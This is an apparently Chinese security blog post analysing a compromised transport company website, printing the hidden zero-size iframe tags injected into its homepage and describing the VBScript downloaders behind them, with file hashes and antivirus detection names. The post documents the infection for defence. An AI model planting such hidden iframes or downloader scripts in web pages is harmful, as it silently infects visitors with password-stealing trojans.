2. 技术人生
    3. 某市长运运输集团有限公司网站被挂马Trojan.PSW.JHOnline.fcd等

    某市长运运输集团有限公司网站被挂马Trojan.PSW.JHOnline.fcd等

    技术2022-05-11  66

    endurer 原创

    2007-02-12 第1

    该网站首页首部被加入代码:/--------<iframe src=hxxp://g***m**06.z**kd**520.cn/k**k*k/wm.htm   width=0 height=0></iframe><iframe src=hxxp://www.y*x***gm***7*8.com/mh/mh.htm width=0 height=0></iframe><iframe src=hxxp://www.y*x***gm***7*8.com/mh/wow.htm width=0 height=0></iframe><iframe src=hxxp://www.2***s*s**s*s.com/qq/pop.htm width=0 height=0></iframe>--------/

    中部被加入代码:/--------<iframe src=hxxp://ll78.com/qq/2.asp width=0 height=0></iframe><iframe src="hxxp://ll78.com/index1.asp" width=0 height=0></iframe><iframe src="hxxp://ll78.com/xiao.htm" width=0 height=0></iframe>--------/

    1、hxxp://g***m**06.z**kd**520.cn/kkk/wm.htm

    包含有使用escape()加密的VBScript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件1.exe,保存为 %temp%/asde.exe,利用Shell.Application 对象 Q 的 ShellExecute 方法 来运行 。/--------文件说明符 : d:/test/1.exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-2-11 22:45:52修改时间 : 2007-2-11 22:45:54访问时间 : 2007-2-11 0:0:0大小 : 59121 字节 57.753 KBMD5 : 42488f09828498af6c511bc1df294791--------/Kaspersky报为:Backdoor.Win32.Agent.aex

    2、hxxp://www.y*x***gm***7*8.com/mh/mh.htm

    包含VBScript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件mh.exe,保存为 %temp%/IE601.com,利用Shell.Application 对象 Q 的 ShellExecute 方法 来运行。/--------文件说明符 : d:/test/mh.exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-2-11 22:50:30修改时间 : 2007-2-11 22:50:32访问时间 : 2007-2-11 0:0:0大小 : 20480 字节 20.0 KBMD5 : 249bbfd18001ff78d14e0b8d7bfb4596--------/

    采用 UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo 加壳

    Kaspersky报为:Trojan-PSW.Win32.OnLineGames.fb

    Scanned file:   mh.exe - Infected

    mh.exe - infected by Trojan-PSW.Win32.OnLineGames.fb

    Statistics:

    Known viruses:266800Updated:11-02-2007File size (Kb):20Virus bodies:1Files:1Warnings:0Archives:0Suspicious:0 瑞星报为: Trojan.PSW.JHOnline.fcd

    3、hxxp://www.y*x***gm***7*8.com/mh/wow.htm

    包含VBScript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件wow.exe,保存为 %temp%/IE603.com,利用Shell.Application 对象 Q 的 ShellExecute 方法 来运行。

    /--------文件说明符 : d:/test/wow.exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-2-11 22:50:47修改时间 : 2007-2-11 22:50:48访问时间 : 2007-2-11 0:0:0大小 : 45056 字节 44.0 KBMD5 : f6d6c2e4bb78416e9e74638be1fc4a8d--------/

    采用BERO加壳Kaspersky报为:Trojan.Win32.Agent.abfDr.Web报为:Trojan.Havedo

    hxxp://www.2***s*s**s*s.com/qq/pop.htmhxxp://l*l***7*8.com/qq/2.asphxxp://l*l***7*8.com/index1.asphxxp://l*l***7*8.com/xiao.htm

    均无法找到该页 

    专利

    最新回复(0)